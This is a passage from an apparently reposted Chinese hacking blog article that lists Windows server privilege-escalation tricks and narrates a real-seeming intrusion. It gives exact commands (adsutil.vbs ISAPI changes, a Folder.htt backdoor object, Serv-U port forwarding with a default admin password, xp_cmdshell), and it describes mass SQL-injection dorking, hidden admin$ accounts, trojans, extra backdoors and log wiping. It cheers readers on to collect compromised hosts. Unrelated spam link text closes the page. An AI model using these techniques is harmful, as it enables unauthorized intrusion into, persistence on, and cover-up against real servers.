    引用:就是這個目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權限的工具上傳上去,然后執行

    6.SU溢出提權

    這個網上教程N多 不詳細講解了

    7.運行Csript

    引用:運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權限
    用這個cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
    查看有特權的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
    再將asp.dll加入特權一族
    asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定一樣)
    我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
    可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去了

    8.腳本提權

    c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs

    9.VNC

    這個是小花的文章 HOHO

    默認情況下VNC密碼存放在HKCU\Software\ORL\WinVNC3\Password

    我們可以用vncx4

    破解它,vncx4使用很簡單,只要在命令行下輸入

    c:\>vncx4 -W

    然后順序輸入上面的每一個十六進制數據,沒輸完一個回車一次就行了。

    10.NC提權

    給對方來個NC 但是條件是你要有足夠的運行權限 然后把它反彈到自己的電腦上 HOHO OK了

    11.社會工程學之GUEST提權
    很簡單 查看他的擁護 一般來說 看到帳戶以后 密碼盡量猜 可能用戶密碼一樣 也可能是他QQ號 郵箱號 手機號 盡量看看 HOHO

    12.IPC空連接

    如果對方真比較白癡的話 掃他的IPC 如果運氣好還是弱口令

    13.替換服務

    這個不用說了吧?個人感覺相當復雜

    14.autorun .inf

    autorun=xxx.exe 這個=后面自己寫 HOHO 加上只讀、系統、隱藏屬性 傳到哪個盤都可以的 不相信他不運行

    15.desktop.ini與Folder.htt

    引用:首先,我們現在本地建立一個文件夾,名字不重要,進入它,在空白處點右鍵,選擇“自定義文件夾”(xp好像是不行的)一直下點,默認即可。完成后,你就會看到在此目錄下多了兩個名為Folder setting的文件架與desktop.ini的文件,(如果你看不到,先取消“隱藏受保護的操作系統文件”)然后我們在Folder setting目錄下找到Folder.htt文件,記事本打開,在任意地方加入以下代碼: <OBJECT ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”你的后門文件名”> </OBJECT> 然后你將你的后門文件放在Folder setting目錄下,把此目錄與desktop.ini一起上傳到對方任意一個目錄下,就可以了,只要等管理員瀏覽了此目錄,它就執行了我們的后門

    16.su覆蓋提權

    本地安裝個su,將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini 覆蓋掉,重起一下Serv-U,于是你上面的所有配置都與他的一模一樣了

    17.SU轉發端口

    43958這個是 Serv -U 的本地管理端口。FPIPE.exe上傳他,執行命令: Fpipe –v –l 3333 –r 43958 127.0.0.1 意思是將3333端口映射到43958端口上。 然后就可以在本地安裝一個Serv-u,新建一個服務器,IP填對方IP,帳號為LocalAdministrator 密碼為#1@$ak#.1k;0@p 連接上后你就可以管理他的Serv-u了

    18.SQL帳戶密碼泄露

    如果對方開了MSSQL服務器,我們就可以通過用SQL連接器加管理員帳號(可以從他的連接數據庫的ASP文件中看到),因為MSSQL是默認的SYSTEM權限。

    引用:對方沒有刪除xp_cmdshell 方法:使用Sqlexec.exe,在host 一欄中填入對方IP,User與Pass中填入你所得到的用戶名與密碼。format選擇xp_cmdshell”%s”即可。然后點擊connect,連接上后就可以在CMD一欄中輸入你想要的CMD命令了

    19.asp.dll

    引用:因為asp.dll是放在c:\winnt\system32\inetsrv\asp.dll   (不同的機子放的位置不一定相同)
    我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
    好了,現在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去
    了,注意,用法中的get和set,一個是查看一個是設置.還有就是你運行上面的你要到C:\Inetpub\AdminScripts>這個目錄下.
    那么如果你是一個管理員,你的機子被人用這招把asp提升為system權限,那么,這時,防的方法就是把asp.dll T出特權一族,也就是用set這個命令,覆蓋掉剛才的那些東東.

    20.Magic Winmail

    前提是你要有個webshell 引用:http://www.eviloctal.com/forum/read.php?tid=3587這里去看吧

    21.DBO……

    其實 提升權限的方式很多的 就看大家怎么利用了 HOHO 加油吧 將服務器控制到底

    第七部分
    菜鳥+Sa+注入工具組合=肉雞成群

    現在,注入漏洞異?;鸨簧俸谟讯祭迷撀┒催^了一把黑客癮,并擁有了不少自己的肉雞。不過對于小菜們來說,注入入侵也并不是那么一帆風順,尤其是在注入點的尋找以及獲得WebShell后的提升權限問題上。在這里,我給廣大初學注入入侵的小菜們提供一種快速獲取sa權限注入點入侵目標主機的辦法。高手可以跳過本文,或者就當是復習吧。
    獲取注入點的方法不外乎兩種:手工尋找和利用注入工具尋找。對于前者,多數是用搜索引擎來找特定的網址(形如xxx.asp?xxid=),對于后者,則是針對具體某個站點用注入工具掃描注入點。不過,你有沒有考慮過把這兩種方法結合起來使用呢?我就傾向于二者的組合使用,方法如下:
    在阿D注入工具中的“掃描注入點”功能模塊的地址欄里輸入并轉到google的網址,選擇“高級搜索”,在搜索結果欄中選擇“100項結果”,語言選擇“簡體中文”,關鍵字填:xxx inurl:asp或是inurl:XX.asp?id=、inurl:xxx.asp?xxid等,這些都是我們常見的可能存在注入點的網址形式,我輸入的是ert inurl:asp(有人說這個關鍵字容易找到sa權限,不知是真是假,但我確實找到了不少)。點擊搜索后,在注入點一欄中馬上就會顯示出N多的有注入點的網址。
    在第一頁中就顯示找到了20幾個(20%),從頭開始試,檢測一下,是不是sa權限,若不是可先跳過。因為本文講的是sa權限,所以在這里我們只找有sa權限注入點的網站,以省去菜鳥們在注入時因一些權限問題而導致入侵卡住的情況。也許有人要問了,有那么多sa權限注入點的網站嗎?根據我的個人經驗,只要你的關鍵字設的好,每100項中就有20幾個(約20%)有注入漏洞的網站,在這些網站中又有5個左右(約5%)是有sa權限的。試想想,只要我們的關鍵字設的好,google可以搜索到的結果何止是100項,一般的搜索結果都在1萬項以上,這樣算來,我們的目標就有成百上千呀(小菜高呼:哇!發財了!),就怕你沒有那么多的精力去注入全部的網站,呵呵!我馬上就找到了一個(運氣好呀,可以去買票了,說不定是頭獎呢?呵呵,又一個百萬富翁!什么?現在百萬富翁不算啥?要不,你給我一百萬??。?。將這個網址復制到明小子的domain3.2中進行檢測,也確實是sa權限,跟阿D注入工具顯示的一樣。
    用domain的命令行功能查看一下開放的端口,發現開放了21、23、80、1433、3389等端口,看來我今天運氣的確不錯呀!加個賬號admin$,但由于管理員已經遠程登錄3389。
    看來我暫時不要登錄的為好。再看看有沒有其它可以利用的東西,用阿D注入工具的目錄瀏覽功能看了一下(個人感覺這方面阿D注入工具要比domain好!明小子怒目圓睜,大叫:你收了阿D多少好處?。┖鋈谎劬σ涣?,發現D盤有一個wwwroot目錄,并且里面有一個目錄和網站名一樣。
    呵呵,好東西呀,向里面寫入個asp木馬試試,瀏覽文件也好方便一些。但接下來讓我郁悶的是明明提示已經上傳成功。
    但在瀏覽器中輸入它的地址卻提示沒有該文件,而且到了后來,domain的命令行功能反饋回來的信息也變得非常凌亂,不知道是怎么回事。于是想換個cmdshell,又想起它開了23端口,用telnet連接了一下,發現有ntlm認證。呵呵,老辦法,在本地新建一個admin$賬號,密碼和目標主機上的一樣,再用這個賬號運行cmd.exe,telnet到目標主機——連接成功,用query user查看了一下終端情況,發現有一個會話處于斷開狀態,于是我便用3389連接了一下,卻提示3389已經達到了最大連接數!我暈,看來有連接數限制,干脆把這個會話結束掉,反正它也斷開了,浪費資源!呵呵,輸入logoff 2(它的會話ID),然后用3389登錄試試,登錄成功。
    本想入侵到這里就結束的,但看了一下這臺主機的配置:P4 3.0,512M內存,我就不禁流口水了,這樣的主機放過了就可惜了,是極品呀,于是就又有了下文的一些曲折!
    用3389進來后,本想在上面安裝Radmin,但發現程序菜單里已經有了,看來是管理員遠程控制用的,此路顯然是不通了。突然想起Radmin的密碼文件是存在注冊表里的,雖然是加了密的,但現在已經有了Radmin密碼的暴力破解工具,把它在注冊表中的密碼鍵值讀取出來保存到一個臨時文件。
    然后編輯這個文件,直接通過3389復制粘貼到本地,用破解軟件跑了半天,沒有結果,看來管理員設的Radmin密碼也不弱智呀!
    算了,再找別的思路吧!在上面裝個rmtsvc?這也是遠程控制軟件中的精品呀!怎么上傳呢,在本地開個FTP,然后通過3389打開一個cmd進行登錄,發現半天沒有反應,它上面有Serv-U,加個賬號再在本地連接試試,也是沒反應!畢竟是個人氣還挺旺的游戲網站嘛,連接的人太多,看來是網速受影響了!沒辦法,前面不是有個1433端口開放了嗎?呵呵,不是還知道它的網站文件所在的目錄了嗎?找數據庫連接文件唄——地球人都知道!我找呀找呀找呀找,找到一個好朋友:connin.asp,打開看了看,密碼就乖乖地躺在里面呢。
    馬上用SQLTools連接上,發現一點擊上傳文件后,也是就卡住了,看來網速的確是受影響了,總不能為了讓網絡流量小一點,就讓我把目標主機強行重啟吧?我可是有點怕怕呀,呵呵!怎么辦呢?
    正當無奈之際,突然看到了桌面上的IE瀏覽器,于是靈光一閃,真是山重水復疑無路,柳暗花明又一村,終于找到救星了!馬上用它從網上下載了一個rmtsvc裝上。呵呵,終于成功安裝!整了半天,我咋就沒想到利用IE直接上網去下載呢?
    到這,我已經完全控制了這臺主機。不過,為了保險起見,通過3389,我把海洋2006木馬的代碼復制過去,保存在網站目錄下,并且,我發現該網站有Dvbbs論壇,于是我用前面找到的數據庫連接密碼,用MSSQL Server的查詢分析器連上去,讀取出后臺管理密碼,可惜是經過加密了的,有總比沒有好。
    然后克隆IIS的默認賬號為管理員。這樣,就安全多了,呵呵,萬一肉雞丟了,還可以再找回來。由于在上面操作過程中下載過東西,把IE的記錄全刪掉,同時處理一下日志,閃人!


    總結:
    1.剛開始學注入的小菜們,大多是通過搜索引擎漫無邊際地找注入點,比較費力!本文的阿D注入工具配合Google搜索引擎批量找注入點可以節省不少的時間,而且也很容易找到有sa權限注入點的網站,畢竟搜索引擎找到的結果數量還是相當驚人的,不過在查找關鍵字上就要多總結技巧,從而最大限度的找到更多的有sa權限注入點的網站!當然,我們也可以用domain來批量檢測,不過個人感覺相比阿D注入工具,Domain找到的注入網站要少一點,而且列目錄功能也沒有阿D注入工具好用。不過,對于命令行功能domain就要略勝一籌了,也可能是我用的阿D注入工具的破解問題或是版本問題                                                                                                                                                                                                                                                                                                                                                                                                                                                                  吧。因此,在這里,我推薦大家把這兩款工具結合起來使用,取二者的長處:通過搜索引擎找有注入點的網站和列目錄功能用阿D的注入工具,執行命令功能用domain,這樣的工具組合,更能提高我們的入侵效率!
    2.對于上傳文件不一定局限于在本地和目標主機之間傳輸文件,也可以在目標主機上直接從網上下載文件。像我本文后半部分的入侵就是。
    3.最后,盡量在肉雞上多放兩個后門,以便肉雞丟失后找回肉雞之用。
    4.對于入侵,最重要的是思路,一個思路不行時,要學會從多方面考慮,這樣我們的黑客技術才能提高!
    5.在找到注入點后,不要習慣性地先去找后臺密碼,再用后臺密碼登錄上傳WebShell去提升權限,要先看看是不是sa權限,因為如果是sa權限的話,我們的權限是很高的,要先試試能不能執行系統級命令如添加管理員賬號、開telnet服務等,同時要注意它的3389服務是不是已經開放。從而避免一些不必要的彎路。
    最后,希望小菜們能通過本文有所啟示,也祝愿廣大黑友們肉雞多多!更希望國內的網站管理員們多關注一下網絡安全!

    轉載。。。。。。。。。。。。。。。。。。。。

    posted on 2007-07-27 09:34 朱巖 閱讀(382) 評論(0)  編輯  收藏 所屬分類: 其他文章


    只有注冊用戶登錄后才能發表評論。


    網站導航:
     
    主站蜘蛛池模板: 叮咚影视在线观看免费完整版| 日本免费网站视频www区| 亚洲AV无码久久精品成人 | 国产午夜免费高清久久影院| 亚洲国产国产综合一区首页| 在线观看成人免费视频| 一级美国片免费看| 亚洲国产精品白丝在线观看| 亚洲?V无码乱码国产精品| 日韩精品免费在线视频| 亚洲男同gay片| 久热综合在线亚洲精品| 国产精品极品美女免费观看| 免费成人在线电影| 另类图片亚洲校园小说区| 亚洲电影国产一区| 免费夜色污私人影院在线观看| 免费A级毛片在线播放| 在线91精品亚洲网站精品成人| 亚洲最新永久在线观看| 免费人成激情视频| 无码人妻精品中文字幕免费东京热| 特级av毛片免费观看| 亚洲白色白色在线播放| 国产自偷亚洲精品页65页| 国产一精品一AV一免费孕妇| 国产精品白浆在线观看免费| 日日摸日日碰夜夜爽亚洲| 亚洲经典在线观看| 国产亚洲人成网站在线观看| 午夜高清免费在线观看| 青娱乐免费在线视频| 免费91最新地址永久入口| 一区在线免费观看| 狠狠综合亚洲综合亚洲色| 亚洲中文字幕一二三四区苍井空| 亚洲激情中文字幕| 精品国产亚洲一区二区在线观看 | 99在线视频免费观看| 黄色毛片免费在线观看| 日韩亚洲产在线观看|